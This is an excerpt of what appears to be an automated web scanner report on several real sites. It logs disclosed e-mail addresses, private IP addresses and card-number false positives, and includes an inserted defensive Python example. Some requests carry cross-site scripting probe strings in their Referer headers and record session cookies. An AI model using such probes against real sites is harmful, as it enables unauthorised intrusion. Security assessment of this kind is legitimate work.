Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /site-map

Issue detail

The following email addresses were disclosed in the response:

Request

GET /site-map HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:48 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.228. http://www.soundingsonline.com/subscription-services

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /subscription-services

Issue detail

The following email addresses were disclosed in the response:

Request

GET /subscription-services HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:15 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.229. http://www.soundingsonline.com/subscription-services/preview-current-issue

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /subscription-services/preview-current-issue

Issue detail

The following email addresses were disclosed in the response:

Request

GET /subscription-services/preview-current-issue HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:15 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.230. http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /subscription-services/subscribe-to-e-newsletter

Issue detail

The following email addresses were disclosed in the response:

Request

GET /subscription-services/subscribe-to-e-newsletter HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:16 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.231. http://www.zvents.com/javascripts/s_code.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zvents.com
Path:   /javascripts/s_code.js

Issue detail

The following email address was disclosed in the response:

Request

GET /javascripts/s_code.js HTTP/1.1
Host: www.zvents.com
Proxy-Connection: keep-alive
Referer: http://www.zvents.com/?afd62%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E659b6a21bfe=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A17F6A851D2D92-40000133A02724D7[CE]; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlOTVjMjQ1ZmI1MTI0ZDg2MjJhNmQyMzI1ZWU4ODZkMGQiDWxvY2F0aW9uexAiCWNpdHkiC0RhbGxhcyILcmFkaXVzaVAiDWxhdGl0dWRlZhczMi43ODI1MDEyMjA3MDMxMjUiCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiDXRpbWV6b25lIhZBbWVyaWNhL01vbnRlcnJleSITZGlzcGxheV9zdHJpbmciD0RhbGxhcywgVFgiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYYLTk2LjgyMDcwMTU5OTEyMTA5NCIRd2hlcmVfc3RyaW5nQBQiCnN0YXRlIgdUWA%3D%3D--e5ccfcada25365dd2467a440cdadee91225f4fd0

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 13:33:35 GMT
Content-Type: application/x-javascript
Last-Modified: Wed, 03 Nov 2010 06:07:09 GMT
Connection: keep-alive
Expires: Sun, 30 Jan 2011 13:33:35 GMT
Cache-Control: max-age=86400
Content-Length: 39869

/* SiteCatalyst code version: H.20.3.
Copyright 1997-2009 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************

...[SNIP]...
=s.mr($C,(vt@tt`Zvt)`fs.hav()+q+(qs?qs:s.rq(^5)),0,id,ta);qs`g;"
+"`Rm('t')`5s.p_r)s.p_r(`I`a`g}^I(qs);^Q`u($3;`j$3`c^1,`G$O1',vb`I@M=^G=s.`Q`r=s.`Q^2=`H`m`g`5s.pg)`H^w@M=`H^weo=`H^w`Q`r=`H^w`Q^2`g`5!id@Vs.tc^ztc=1;s.flush`U()}`4#7`Ctl`0o,t,n,vo`2;s.@M=$Go`I`Q^2=t"
+";s.`Q`r=n;s.t($3}`5pg){`H^wco`0o){`P^s\"_\",1,$8`4$Go)`Cwd^wgs`0u@v`P^sun,1,$8`4s.t()`Cwd^wdc`0u@v`P^sun,$8`4s.t()}}@8=(`H`M`k`9`3'@Os^y0`Id
...[SNIP]...

22. Private IP addresses disclosed
There are 2 instances of this issue:

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.


22.1. http://digg.com/submit

Summary

Severity:   Information
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /submit?phase=2&url=http://www.bostonherald.com HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:25:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1163912321857224960%3A171; expires=Sun, 30-Jan-2011 05:25:29 GMT; path=/; domain=digg.com
Set-Cookie: d=77e17940db831f181383a5bb3cb5c736d63ecf04d0fe3deac9bb624c4d81a73d; expires=Thu, 28-Jan-2021 15:33:09 GMT; path=/; domain=.digg.com
X-Digg-Time: D=37770 10.2.128.190
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7660

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
<span title="10.2.128.190 Build: 196 - Wed Jan 26 14:41:03 PST 2011">
...[SNIP]...

22.2. http://digg.com/submit

Summary

Severity:   Information
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:25:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1163912321857224960%3A171; expires=Sun, 30-Jan-2011 05:25:28 GMT; path=/; domain=digg.com
Set-Cookie: d=f148f02d29ba659b182b1c54e053268c0b2309202a4d0c9ea1fb51eef766d1ad; expires=Thu, 28-Jan-2021 15:33:08 GMT; path=/; domain=.digg.com
X-Digg-Time: D=27902 10.2.128.186
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7633

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
<span title="10.2.128.186 Build: 196 - Wed Jan 26 14:41:03 PST 2011">
...[SNIP]...

23. Credit card numbers disclosed
There are 6 instances of this issue:

Issue background

Responses containing credit card numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. This check fires on any digit string of card-number length that passes the Luhn checksum, so numeric identifiers, timestamps, coordinates and distances regularly trigger it: the local.nissanusa.com hits below sit in dealer-locator JSON made up of phone numbers, distances and coordinates, and the ad.doubleclick.net hit sits in ad-serving JavaScript. You should verify whether the numbers identified are actually valid credit card numbers and whether their disclosure within the application is appropriate.
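The three passive checks behind sections 21, 22 and 23 (e-mail addresses, RFC 1918 addresses and Luhn-valid card-length numbers in a response) are easy to reproduce outside the scanner, which is useful when triaging a report like this one. The Python below is an added example, not part of this report or of the scanner that produced it. The sample response is constructed, modelled on the digg.com and local.nissanusa.com entries: the e-mail address, the 16-digit number (a well-known test card number), the 203.0.113.5 and 8.8.8.8 hosts and the hdnOrderRef field are made up. The "decimal fraction" heuristic in card_candidates is an assumption added here to separate coordinates and distances from real card numbers; it is not how the scanner classifies hits.

```python
import ipaddress
import re

# Constructed sample, modelled on the digg.com and local.nissanusa.com
# entries in this report. The e-mail address, the 16-digit number, the
# hdnOrderRef field and the 203.0.113.5 / 8.8.8.8 hosts are made up.
SAMPLE_RESPONSE = """HTTP/1.1 200 OK
Server: Apache
X-Digg-Time: D=37770 10.2.128.190
Content-Type: text/html;charset=UTF-8

<span title="10.2.128.190 Build: 196 - Wed Jan 26 14:41:03 PST 2011">
The administrator email is admin@example.com
"hdnDealerDistance":"85.4983267960337","hdnOrderRef":"4111111111111111"
upstream 203.0.113.5, resolver 8.8.8.8
"""

# Only the three RFC 1918 blocks; ipaddress.is_private would also flag
# loopback, link-local and documentation ranges such as 203.0.113.0/24.
RFC1918 = [ipaddress.ip_network(n)
           for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
DIGIT_RUN_RE = re.compile(r"(?<!\d)\d{13,16}(?!\d)")  # card-number lengths


def private_ips(text):
    """RFC 1918 addresses found in text, deduplicated, in order of appearance."""
    found = []
    for candidate in IPV4_RE.findall(text):
        try:
            ip = ipaddress.IPv4Address(candidate)
        except ValueError:          # e.g. an octet above 255
            continue
        if any(ip in net for net in RFC1918) and candidate not in found:
            found.append(candidate)
    return found


def disclosed_emails(text):
    """E-mail addresses found in text, deduplicated, in order of appearance."""
    return list(dict.fromkeys(EMAIL_RE.findall(text)))


def luhn_ok(digits):
    """Luhn checksum: double every second digit from the right, subtract 9
    when the doubled value exceeds 9, and require a sum divisible by 10."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


def card_candidates(text):
    """Card-length digit runs that pass Luhn. Each hit is paired with a flag
    saying whether it is the fractional part of a decimal number (preceded
    by '<digit>.'), a heuristic added here to mark likely false positives
    such as distances and coordinates."""
    hits = []
    for m in DIGIT_RUN_RE.finditer(text):
        digits = m.group()
        if not luhn_ok(digits):
            continue
        s = m.start()
        is_fraction = s >= 2 and text[s - 1] == "." and text[s - 2].isdigit()
        hits.append((digits, is_fraction))
    return hits


def scan_response(text):
    """Run all three passive checks over one raw HTTP response."""
    return {
        "private_ips": private_ips(text),
        "emails": disclosed_emails(text),
        "card_numbers": card_candidates(text),
    }


if __name__ == "__main__":
    for check, result in scan_response(SAMPLE_RESPONSE).items():
        print(f"{check}: {result}")
```

Run against the sample, the fractional part of the dealer distance (4983267960337, thirteen digits) passes Luhn just as the test card number does, which is exactly the kind of hit that makes manual verification of this check mandatory; the fraction flag is what lets a triager discard it quickly.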


23.1. http://ad.doubleclick.net/adj/N3340.trfu/B4677841.19

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3340.trfu/B4677841.19

Issue detail

The following credit card number was disclosed in the response:

Request

GET /adj/N3340.trfu/B4677841.19;sz=728x90;pc=[TPAS_ID];click=http://a.tribalfusion.com/h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/;ord=1114973045? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(1)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Fri, 28 Jan 2011 14:48:47 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 33401

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
,_imp.creative.39942763";
this.thirdPartyFlashDisplayUrl = "";
this.thirdPartyBackupImpUrl = "";
this.surveyUrl = "http://js.dmtry.com/antenna2.js?0_471_4677841-363295_0";
this.googleContextDiscoveryUrl = "http://pagead2.googlesyndication.com/pagead/ads?client=dclk-3pas-query&output=xml&geo=true";
this.livePreviewSiteUrl = "%LivePrevi
...[SNIP]...

23.2. http://local.nissanusa.com/louisville-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /louisville-area

Issue detail

The following credit card number was disclosed in the response:

Request

GET /louisville-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:52:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:52:17 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=40201; expires=Sat, 05-Feb-2011 04:52:17 GMT; path=/
Set-Cookie: localDMA=louisville-area; expires=Sat, 05-Feb-2011 04:52:17 GMT; path=/
Content-Length: 118285

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...
"hdnDealerZip":"42141","hdnCountryRegion":"US","hdnDealerPhone":"(270) 678-1300","hdnFax":"(270) 678-1557","hdnDealerEmail":"","hdnDealerUrl":"http:\/\/www.goodmannissan.com\/","hdnDealerDistance":"85.4983267960337","hdnMake":"Nissan","hdnActive":"true","hdnOwnerfirst":"false","hdnPrefered":"true","hdnExcellenceCode":"3","hdnExpressService":"false","hdnGTR":"false","hdnSTLatitude":"37.014971","hdnSTLongitude":"-
...[SNIP]...

23.3. http://local.nissanusa.com/miami-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /miami-area

Issue detail

The following credit card number was disclosed in the response:

Request

GET /miami-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:55:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:55:29 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=33101; expires=Sat, 05-Feb-2011 04:55:28 GMT; path=/
Set-Cookie: localDMA=miami-area; expires=Sat, 05-Feb-2011 04:55:28 GMT; path=/
Content-Length: 116534

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...
alerZip":"33135","hdnCountryRegion":"US","hdnDealerPhone":"(305) 448-7431","hdnFax":"(305) 443-8757","hdnDealerEmail":"","hdnDealerUrl":"http:\/\/www.maroonenissanofmiami.com\/","hdnDealerDistance":"3.4067065991938197","hdnMake":"Nissan","hdnActive":"true","hdnOwnerfirst":"true","hdnPrefered":"true","hdnExcellenceCode":"1","hdnExpressService":"false","hdnGTR":"true","hdnSTLatitude":"25.7648054361763","hdnSTLongitud
...[SNIP]...

23.4. http://local.nissanusa.com/nashville-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /nashville-area

Issue detail

The following credit card number was disclosed in the response:

Request

GET /nashville-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:56:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:56:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=37201; expires=Sat, 05-Feb-2011 04:56:10 GMT; path=/
Set-Cookie: localDMA=nashville-area; expires=Sat, 05-Feb-2011 04:56:10 GMT; path=/
Content-Length: 119690

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...
hdnDealerZip":"37115","hdnCountryRegion":"US","hdnDealerPhone":"(615) 865-7220","hdnFax":"(615) 860-2036","hdnDealerEmail":"","hdnDealerUrl":"http:\/\/www.nissanofrivergate.com","hdnDealerDistance":"7.5097695224832774","hdnMake":"Nissan","hdnActive":"true","hdnOwnerfirst":"false","hdnPrefered":"true","hdnExcellenceCode":"1","hdnExpressService":"false","hdnGTR":"false","hdnSTLatitude":"36.2636053226187","hdnSTLongit
...[SNIP]...

23.5. http://local.nissanusa.com/new-york-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /new-york-area

Issue detail

The following credit card number was disclosed in the response:

Request

GET /new-york-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:52:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:52:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=10001; expires=Sat, 05-Feb-2011 04:52:19 GMT; path=/
Set-Cookie: localDMA=new-york-area; expires=Sat, 05-Feb-2011 04:52:19 GMT; path=/
Content-Length: 217093

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...
dnDealerZip":"18503","hdnCountryRegion":"US","hdnDealerPhone":"(570) 558-2000","hdnFax":"(570) 558-2010","hdnDealerEmail":"","hdnDealerUrl":"http:\/\/www.tomhessernissan.com\/","hdnDealerDistance":"98.36387327947486","hdnMake":"Nissan","hdnActive":"true","hdnOwnerfirst":"false","hdnPrefered":"true","hdnExcellenceCode":"3","hdnExpressService":"false","hdnGTR":"false","hdnSTLatitude":"41.4104533905468","hdnSTLongit
...[SNIP]...

23.6. http://local.nissanusa.com/sacramento-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /sacramento-area

Issue detail

The following credit card number was disclosed in the response:

Request

GET /sacramento-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:57:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:57:23 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=95814; expires=Sat, 05-Feb-2011 04:57:22 GMT; path=/
Set-Cookie: localDMA=sacramento-area; expires=Sat, 05-Feb-2011 04:57:22 GMT; path=/
Content-Length: 129688

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...
